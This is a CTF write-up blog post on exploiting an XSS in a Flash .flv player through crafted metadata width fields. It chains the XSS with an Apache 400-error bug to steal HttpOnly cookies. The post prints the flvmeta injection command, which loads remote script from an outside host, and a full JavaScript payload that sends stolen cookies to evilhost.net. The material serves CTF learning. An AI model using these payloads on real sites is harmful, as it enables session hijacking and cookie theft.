→ Forbiddenbits - Task 3

| No TrackBacks
Task 3 Solution

The truth lays behind the earth --> hint to Flash-based .flv player.
After player decompilation we can see a vulnerable part of code. There was exploitable XSS through .flv metadata (width and height fields):
ns.onMetaData = function (obj)
{
  metaWidth = obj.width;
  metaHeight = obj.height;
  duration = obj.duration;
  ...
  flv._visible = 1;
  if (jsCallback)
  {
    getURL("javascript:flvStart(\'" + metaWidth + "\',\'" + metaHeight + "\')", "");
  } // end if
Then we thought about newest vulnerability in Apache with default 400-error page (http://www.exploit-db.com/exploits/18442/), which allows to steal a HTTPOnly-protected cookies. So we made a malicious .flv-file with modified metadata.

Here was a little problem: flvmeta editor could only add metatags to .flv, and in final .flv file we had a duplicated metainfo. To avoid this bug some strings in flvmeta were commented.
Patch for flvmeta (info.c):
amf_associative_array_add(meta->on_metadata, "lastkeyframetimestamp", amf_nu
...
/*
if (info->video_width > 0)
amf_associative_array_add(meta->on_metadata, "width", amf_number_new(inf
if (info->video_height > 0)
amf_associative_array_add(meta->on_metadata, "height", amf_number_new(in
*/

video_data_rate = ((info->real_video_data_size / 1024.0) * 8.0) / duration;
...

Then we made a EVIL.flv file, which injects a JS-sploit into htmlpage, and finally this sploit stole ALL user cookies. Link to this magic file was sended through feedback form on site.

http://208.64.122.30/player.swf?flvToPlay=http://kyprizel.net/ctf/TN11.flv&autoStart=true&autoreplay=false&hiddenGui=false&jsCallback=true

PROFIT!

./flvmeta -U --add=width="'+(e=document.createElement('script'),e.src='http://kyprizel.net/ctf/pureevilpart3.js',document.body.appendChild(e))+'" EVIL.flv


JS pureevilpart3.js:
var today = new Date();
var expire = new Date();
expire.setTime(today.getTime() + 2000);
gotCookie=false;
padding="";
for (j=0;j<=1000;++j) 
{
  padding+="A";
}
for (i=0;i < 10; ++i) 
{
  document.cookie="z"+i+"="+padding+"; expires="+expire.toGMTString()+"; path=/;"
}
function handler() 
{
  if (!gotCookie && this.responseText.length > 1) 
  {
    text = /(Cookie[^;]*)/i.exec(this.responseText);
    location.href='http://evilhost.net/?c='+escape(text);
    gotCookie=true;
  }
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = handler;
xhr.open("GET", "/httponly.php");
xhr.send();

No TrackBacks

TrackBack URL: http://smokedchicken.org/m/mt-tb.cgi/66

About this Entry

This page contains a single entry by Юрий Леонычев published on February 13, 2012 3:40 PM.

Forbiddenbits - Task 2 was the previous entry in this blog.

Codegate Quals - Forensic 100 is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.